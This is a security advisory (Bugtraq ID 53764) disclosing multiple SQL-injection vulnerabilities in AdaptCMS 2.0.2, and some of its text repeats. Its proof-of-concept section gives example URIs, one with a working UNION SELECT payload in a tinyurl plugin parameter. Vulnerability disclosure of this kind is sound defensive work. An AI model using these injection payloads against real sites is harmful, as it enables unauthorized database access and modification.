AdaptCMS Mulitiple SQL Injection Vulnerabilities
BID:53764
Info
AdaptCMS Mulitiple SQL Injection Vulnerabilities
| Bugtraq ID: | 53764 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 03 2012 12:00AM |
| Updated: | Jun 03 2012 12:00AM |
| Credit: | KedAns-Dz |
| Vulnerable: |
AdaptCMS AdaptCMS 2.0.2 |
| Not Vulnerable: | |
Discussion
AdaptCMS Mulitiple SQL Injection Vulnerabilities
AdaptCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AdaptCMS 2.0.2 is vulnerable; other versions may also be affected.
AdaptCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AdaptCMS 2.0.2 is vulnerable; other versions may also be affected.
Exploit / POC
AdaptCMS Mulitiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/index.php?view=plugins&plugin=tinyurl&module=go&id='1337 AND 2=1 UNION SELECT 1,2,3,4,5--
http://www.example.com/admin.php?view=plugins&do=load&plugin=tinyurl&module=delete&id=[ + SQL Injection Code + ]
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/index.php?view=plugins&plugin=tinyurl&module=go&id='1337 AND 2=1 UNION SELECT 1,2,3,4,5--
http://www.example.com/admin.php?view=plugins&do=load&plugin=tinyurl&module=delete&id=[ + SQL Injection Code + ]